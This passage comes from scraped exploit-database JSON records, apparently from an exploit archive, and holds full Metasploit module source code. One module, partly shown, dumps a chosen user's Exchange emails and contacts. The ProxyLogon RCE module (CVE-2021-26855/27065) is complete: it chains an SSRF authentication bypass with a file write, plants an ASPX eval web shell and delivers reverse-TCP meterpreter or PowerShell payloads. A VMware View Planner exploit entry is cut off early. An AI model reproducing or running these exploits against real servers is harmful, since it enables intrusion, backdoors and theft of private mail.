'2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\n ['URL', 'http://aka.ms/exchangevulns']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def grab_contacts\n response = send_xml(soap_findcontacts)\n xml = Nokogiri::XML.parse(response.body)\n\n data = xml.xpath('//t:Contact', XMLNS)\n if data.empty?\n print_status(' - the user has no contacts')\n else\n write_loot(data.to_s)\n end\n end\n\n def grab_emails(total_count)\n # get the emails list of the target folder.\n response = send_xml(soap_maillist(total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n # iteration to download the emails.\n xml.xpath('//t:ItemId', XMLNS).each do |item|\n print_status(\" - download item: #{item.values[1]}\")\n response = send_xml(soap_download(item.values[0], item.values[1]))\n xml = Nokogiri::XML.parse(response.body)\n\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\n write_loot(Rex::Text.decode_base64(message))\n end\n end\n\n def send_xml(data)\n uri = normalize_uri('ecp', 'temp.js')\n\n received = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => data\n )\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_download(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_findcontacts\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='contacts'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_mailnum\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_maillist(max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(data)\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\n print_good(\" - file saved to #{loot_path}\")\n end\n\n def run\n # get the informations about the targeted user account.\n response = send_xml(soap_mailnum)\n if response.body =~ /Success/\n print_status('Connection to the server is successful')\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\n\n # grab contacts.\n print_status('Attempt to dump contacts list for this user')\n grab_contacts\n\n print_line\n\n # grab emails.\n print_status('Attempt to dump emails for this user')\n xml = Nokogiri::XML.parse(response.body)\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\n\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\n print_status(\" - number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n grab_emails(total_count)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T08:02:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 Versions less than 15.00.1497.012, Exchange 2016 CU18 less than 15.01.2106.013, Exchange 2016 CU19 less than 15.01.2176.009, Exchange 2019 CU7 less than 15.02.0721.013, and Exchange 2019 CU8 less than 15.02.0792.010. All components are vulnerable by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyLogon Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36024", "href": "https://0day.today/exploit/description/36024", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n [server, legacy_dn]\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Prepare the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Write the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning(\"Wait a lot (#{i})\")\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-21T21:20:59", "description": "This Metasploit module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. Successful exploitation will result in remote code execution as the apache user inside the appacheServer Docker container.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-19T00:00:00", "type": "zdt", "title": "VMware View Planner 4.6 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "1337DAY-ID-35998", "href": "https://0day.today/exploit/description/35998", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 